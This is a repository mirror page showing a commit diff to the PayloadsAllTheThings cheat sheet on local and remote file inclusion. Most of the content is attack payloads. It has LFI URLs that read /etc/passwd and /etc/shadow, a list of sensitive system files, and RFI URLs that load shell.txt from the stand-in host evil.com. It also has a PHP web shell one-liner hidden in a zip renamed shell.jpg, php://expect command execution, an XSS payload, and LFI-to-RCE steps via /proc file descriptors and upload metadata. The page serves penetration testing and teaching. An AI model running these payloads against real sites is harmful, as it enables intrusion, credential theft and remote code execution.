ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-02-20 13:46:05 +00:00
Code Issues Actions 1 Packages Projects Releases Wiki Activity

LFI via /proc/*/fd + upload

Browse Source
This commit is contained in:
Swissky 2017-08-15 02:37:09 +02:00
parent 901d279fb3
commit c36d31ec5d
1 changed files with 45 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

52
File Inclusion - Path Traversal/README.md
View File

@ -1,9 +1,7 @@
# Local/Remote File Inclusion
The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
## Exploit
Basic LFI (null byte, double encoding and other tricks)
## Basic LFI (null byte, double encoding and other tricks)
```
http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd%00
@ -12,6 +10,31 @@ http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd
```
Interesting files to check out :
```
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline
```
## Basic RFI (null byte, double encoding and other tricks)
```
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
```
## LFI / RFI Wrappers
LFI Wrapper rot13 and base64 - php://filter case insensitive
```
@ -26,7 +49,10 @@ http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encod
LFI Wrapper ZIP
```python
os.system("echo \"</pre><?php system($_GET['cmd']); ?></pre>\" > payload.php; zip payload.zip payload.php; mv payload.zip shell.jpg; rm payload.php")
echo "</pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php
http://example.com/index.php?page=zip://shell.jpg%23payload.php
```
@ -43,13 +69,25 @@ http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls
```
XSS via RFI/LFI with "<<svg<>svg onload=alert(1)>" payload
<svg onload=alert(1)>
## Bonus XSS
XSS via RFI/LFI with "<svg onload=alert(1)>" payload
```
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
```
## LFI to RCE via /proc/*/fd
1. Upload a lot of shells (for example : 100)
2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD
with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)
## LFI to RCE via Upload
```
http://example.com/index.php?page=path/to/uploaded/file.png
```
You can injected the <?php system($_GET['c']); ?> into the metadata
## Thanks to
* [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
* [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/)
* [Turning LFI to RFI ](https://l.avala.mp/?p=241)